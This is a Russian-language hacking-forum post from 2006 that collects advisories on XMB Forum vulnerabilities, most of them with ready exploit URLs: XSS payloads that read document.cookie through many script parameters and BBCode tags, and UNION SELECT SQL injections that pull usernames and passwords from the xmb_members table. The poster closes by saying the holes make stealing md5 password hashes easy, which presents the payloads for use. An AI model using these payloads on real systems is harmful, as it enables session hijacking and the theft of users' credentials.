Показать сообщение отдельно

  #3  
Старый 14.07.2006, 05:46
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
Thumbs up

[CODE]Программа: XMB 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует при обработке поля "Your Current Mood" при регистрации учетной записи. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

Программа: XMB 1.9.3, возможно более ранние версии
Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах файла куки в сценарии today.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения

Программа: XMB Forum 1.9.3 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре username сценария u2u.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]/u2u.php?action=send&username=
Код:
 
Программа: XMB Forum 1.8 Partagium Final SP2 (Build: 2003100518) 
Опасность: Средняя 

Наличие эксплоита: Да 

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может выполнить SQL команды на основной базе данных и выполнить XSS нападение. 

Пример/Эксплоит: 

http://[target]/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>

http://[target]/xmb18sp2/member.php?action=viewpro&member=x<%73cript>al ert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);
</%73cript>

http://[target]/xmb18sp2/editprofile.php? user=x"><%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/viewthread.php?tid=1&ppp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target] /xmb18sp2/misc.php?action=list&order=postnum&desc=x


http://[target]/xmb18sp2/misc.php?action=list&order=postnum&desc=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&tpp=x<%73cript>alert
(document.cookie);</%73cript>

http://[target]/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x<%73cript>ale rt
(document.cookie);</%73cript>

text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]


text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2


 http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL 
SELECT NULL,NULL,username FROM xmb_members WHERE uid=1
LIMIT 1/*

http://[target]/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT
 NULL,NULL,password FROM xmb_members WHERE uid=1
LIMIT 1/*

Программа: XMB Forum 1.8 Partagium SP3; 1.9 Nexus Beta 
Опасность: Средняя 

Наличие эксплоита: Да 

Описание: Несколько уязвимостей обнаружено в XMB Forum. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. 

Пример/Эксплоит: 

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

http://localhost/xmb19beta/member.php?action=viewpro&m ember=waraxe&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY %20p.fid%20UNION%20SELECT%20password,null,9

http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%2 0SELECT%20username,null,9

http://localhost/xmb19beta/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/misc.php?act ion=search&restrict=%20private=-99%20UNION%20SELECT%20null,null,password,null,null,null,null,null,null,null,null,
1%20LIMIT%201%20/*

http://localhost/xmb19beta/today. php?restrict=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=alert(document.cookie);>

http://localhost/xmb19beta/editprofile.php?u ser=notexist_foobar&u2uheader=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/u2u.php?folder=foobar"><body%20onload=alert(document.cookie);>

http ://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&replymost=" ></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>

htt p://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/post.php?action=newthre ad&fid=1&icons=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body%20onload=alert(document.cookie);>

http://l ocalhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body%20onload= alert(document.cookie);>

http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body%20onload=alert(document.cookie);>

http://localhost/xmb19beta/forumdispla y.php?fid=1&forumdisplay=<body%20onload=alert(document.cookie);>

Программа: XMB Forum 1.9.1 
Опасность: Низкая 

Наличие эксплоита: Нет 

Описание: 
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важной информации пользователей. 

Уязвимость существует из-за недостаточной фильтрации данных в параметре Mood и поле Send To. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Это ещё не все
Код:
http://www.securitylab.ru/vulnerability/page1_670.php?page=1_670&arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=xmb&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
в иксМБ много иксс! Можно спокойно мд5 угнать

Последний раз редактировалось Azazel; 14.07.2006 в 10:39..
 
Ответить с цитированием